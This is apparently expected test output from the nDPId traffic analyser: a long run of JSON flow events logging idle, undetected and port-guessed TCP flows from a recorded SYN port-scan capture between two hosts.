-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5959,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1863,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1863,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5960,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1864,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5959,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5961,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5960,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1864,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5962,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5961,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5962,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5963,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5963,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 